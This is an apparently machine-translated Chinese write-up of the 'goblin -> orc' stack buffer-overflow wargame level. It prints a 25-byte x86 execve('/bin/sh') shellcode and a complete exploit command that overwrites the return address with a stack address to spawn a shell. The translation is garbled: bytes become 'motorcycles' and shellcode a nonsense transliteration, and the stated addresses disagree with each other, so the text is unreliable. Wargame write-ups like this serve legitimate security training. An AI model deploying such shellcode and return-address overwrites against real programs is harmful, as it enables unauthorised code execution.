goblin -> orc

这次不能使用环境变数
而且RET的最后不是
\xbf
的话,程序就结束啦.那么,buffer里加入了Shelcode,寻找buffer开始的Address,把它写在RET上.
再次控制苏斯科德,做跳舞吧.

[esp-80]看到附近的地方吧

0 xbffcb 0最后加入
\xbf
因此,buffer开始的Address是0 xbffffc 90试着攻击
下面是25个摩托车
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
谢尔科德25摩托+RET开始之前的19摩托是没有意义的文字+4摩托的buffer Address攻击科曼多就像这样
./orc `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*19+"\x90\xfc\xff\xbf"'`

シェル获得.
Reference
この問題について(goblin -> orc), 我々は、より多くの情報をここで見つけました https://velog.io/@bin3635/goblin-orcテキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol